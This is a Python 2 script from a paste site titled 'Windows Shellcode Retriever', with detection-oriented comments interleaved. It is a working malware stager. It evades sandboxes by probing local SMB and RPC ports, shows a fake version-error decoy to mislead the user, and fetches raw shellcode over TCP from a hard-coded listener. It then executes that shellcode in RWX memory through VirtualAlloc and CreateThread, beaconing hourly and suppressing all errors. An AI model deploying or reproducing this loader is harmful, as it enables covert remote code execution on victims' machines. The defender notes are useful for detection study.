opexxx

Shellcode Retriever

Sep 1st, 2015
  1. #!/usr/bin/env python
  2. #
  3. # Windows Shellcode Retriever
  4. # By: HR
  5. #
  6. # It's just a slightly modified version of Joshua Pitts' Shellcode Retriever Script...
  7. # Use Shellcode Sender on the other end to serve up your payloads for execution
  8. #
  9.  
  10. import ctypes, os, signal, socket, sys, time
  11.  
# Hard-coded connection and beacon parameters. For detection purposes these
# are the sample's static network indicators: a fixed listener address (a
# private RFC 1918 address as pasted) and a fixed high port, re-contacted
# every BEACON_DELAY seconds for as long as BEACON is True (see main()).
TARGET='192.168.1.4' # Shellcode Sender Listener IP
PORT=31337           # Shellcode Sender Listener Port
BEACON=True          # Repeat Shellcode Retrieval
BEACON_DELAY=3600    # 1 hour delay between retrieval attempts
  16.  
  17.  
def system_info():
  """
    Run SYSTEMINFO and return selected fields in a dictionary, e.g.
      {
        'Available Physical Memory': '644 MB',
        'Product ID': '00426-OEM-8992662-00006',
        'OS Name': 'Microsoft Windows 7 Ultimate',
        'BIOS Version': 'Phoenix Technologies LTD 6.00, 7/2/2012',
        'System Model': 'VMware Virtual Platform',
        'System type': 'X86-based PC',
        'Total Physical Memory': '1,023 MB',
        'Logon Server': '\\\\WIN-6CQ3JVLCHM4',
        'Domain': 'WORKGROUP',
        'Windows Directory': 'C:\\Windows',
        'OS Version': '6.1.7601 Service Pack 1 Build 7601',
        'System Manufacturer': 'VMware, Inc.',
        'Host Name': 'WIN-6CQ3JVLCHM4'
      }

    Example:
       >>> info = system_info()
       >>> info['OS Version']
       '6.1.7601 Service Pack 1 Build 7601'

    Python 2 only (os.popen2). Only decoy_message() calls this, to print
    the OS version in its fake error text. Host-side, spawning SYSTEMINFO
    from a script process is itself a common triage/discovery indicator.

    Borrowed from our sacred stackoverflow:
       http://stackoverflow.com/questions/467602/how-can-i-read-system-information-in-python-on-windows
  """
  values  = {}
  # popen2 returns (stdin, stdout); only the child's stdout is read.
  cache   = os.popen2("SYSTEMINFO")
  source  = cache[1].read()
  sysOpts = ["Host Name", "OS Name", "OS Version", "Product ID", "System Manufacturer", "System Model", "System type", "BIOS Version", "Domain", "Windows Directory", "Total Physical Memory", "Available Physical Memory", "Logon Server"]
  for opt in sysOpts:
    # First match of "<label>:<whitespace><value>" per field, case-insensitive;
    # labels are the English SYSTEMINFO strings, so a localized Windows may
    # not produce a match here.
    values[opt] = [item.strip() for item in re.findall("%s:\w*(.*?)\n" % (opt), source, re.IGNORECASE)][0]
  return values
  52.  
  53.  
def decoy_message():
  """
    Decoy Message to Present to User on Epic Failure

    Prints a plausible-looking "unsupported version" error (padded with the
    real platform and OS version) and exits with status 0. This is the
    social-engineering half of the script: it gives a user who ran the file
    a benign explanation for nothing happening. Used by sandbox_check() and
    by main() when TARGET is empty.
  """
  info = system_info()
  print "\n[x] Unsupported Windows Version!"
  print "   [*] Platform: %s" % sys.platform
  print "   [x] Build Version: %s" % info['OS Version']
  print "\n[*] Keep Checking Developer Site for updates...\n\n"
  # Exit code 0 so the failure looks clean to whoever launched it.
  sys.exit(0)
  62.  
  63.  
def sandbox_check():
  """
    Quick sandbox check for additional av evasion.
    And a message to throw the user off.

    The heuristic is two loopback TCP probes: 127.0.0.1:445 (SMB) and, only
    if that fails, 127.0.0.1:135 (RPC endpoint mapper). If neither accepts a
    connection the host is assumed not to be a real Windows workstation and
    decoy_message() terminates the process. Defender note: a non-service
    process connecting to its own 445/135 is a useful host-based indicator
    of this fingerprinting step, and it happens before any outbound traffic.
  """
  ##################################################################################
  # Add some mathematical stuff or some time consuming activities for added delays #
  ##################################################################################
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sandbox = True
  try:
    s.connect(('127.0.0.1', 445))
    s.close()
    sandbox = False
  except:
    # Bare except: any failure (refused, timeout, firewall) counts as "suspicious".
    pass
  if sandbox == True:
    try:
      # Same socket object is reused for the second probe.
      s.connect(('127.0.0.1', 135))
      s.close()
    except:
      # Mission Abort!
      decoy_message()
  87.  
  88.  
def run_shellcode(shellcode):
  """
    ctypes VirtualAlloc, RtlMoveMemory, and CreateThread
    From http://www.debasish.in/2012_04_01_archive.html

    Executes *shellcode* (a bytearray, see fetch_shellcode) inside the
    current process and blocks until the thread exits. Detection note: a
    private allocation committed as PAGE_EXECUTE_READWRITE (0x40) that is
    then used as a CreateThread start address is the textbook in-memory
    code-execution sequence; memory-scan and thread-start-address telemetry
    in EDR products key on exactly this. None of the Windows API return
    values are checked.
  """
  # Get pointer to our allocated memory space
  # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
  pointer = ctypes.windll.kernel32.VirtualAlloc(
    ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40)
  )

  # Move Shellcode into memory
  # from_buffer() requires a writable buffer, which is why the caller
  # converted the received bytes to a bytearray.
  buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
  ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_int(pointer),
    buf,
    ctypes.c_int(len(shellcode))
  )

  # Create new thread and run our shellcode in it
  # Start address is the RWX allocation itself; no thread parameter is passed.
  thread_handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(pointer),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
  )

  # Wait for our thread to finish or timeout
  # -1 is INFINITE, so this returns only when the payload thread ends.
  ctypes.windll.kernel32.WaitForSingleObject(
    ctypes.c_int(thread_handle),
    ctypes.c_int(-1)
  )
  return
  126.  
  127.  
  128.  
def fetch_shellcode(target, port):
  """
    Raw TCP Socket Request to Target:Port to grab our remote shellcode
    The received Shellcode is then passed off to be run

    The stream is read until the peer closes the connection and the bytes
    go straight to run_shellcode() with no authentication, integrity check
    or decryption, so whatever answers on target:port decides what executes
    in this process. Network-side this is a plaintext blob pulled from a
    fixed high port, repeated on the beacon interval by main(). Connection
    errors propagate to the caller (socket.error).
  """
  # Open TCP Socket Connection to target:port
  print '[*] Downloading Shellcode...'
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target,port))

  # Receive shellcode
  # Python 2 semantics: recv() returns '' once the peer has closed.
  data = s.recv(1024)
  shellcode = data
  while data != '':
    data = s.recv(1024)
    if data == '':
      break
    else:
      shellcode += data

  # Convert to Bytearray for usability sake
  # (run_shellcode needs a writable buffer for ctypes from_buffer)
  shellcode = bytearray(shellcode)

  # Pass to be run in memory...
  # The socket is never closed explicitly; it is left to garbage collection.
  print '[*] Executing Shellcode in Memory....'
  run_shellcode(shellcode)
  155.  
  156.  
  157.  
def main():
  """
    Entry point: environment check, one immediate fetch, then an optional
    beacon loop. Every exception from the fetch/execute path is swallowed,
    so an unreachable listener produces no output at all — the process just
    exits quietly (or, if the first fetch succeeded and BEACON is True,
    the loop ends on the first error).
  """
  # Does making connetions raise alerts?
  sandbox_check()

  if TARGET == '':
    decoy_message() # If you cant read and edit source, you fail
#    TARGET = raw_input("Enter Shellcode Listner IP: ")
#    PORT = raw_input("Enter Shellcode Listner Port: ")
  try:
    fetch_shellcode(TARGET, int(PORT))
    # Periodic re-contact: sleep BEACON_DELAY seconds, fetch again, forever.
    # This fixed-interval outbound connection is the network-side indicator.
    while BEACON is True:
#      print '[*] Sleeping for %d seconds....' % BEACON_DELAY
      time.sleep(BEACON_DELAY)
      fetch_shellcode(TARGET, int(PORT))

  except Exception, e:
    # Deliberately silent: no error output reaches the user.
#    print str(e)
    pass
  176.    
# Script guard: nothing runs on import; main() only executes when launched directly.
if __name__ == "__main__":
  main()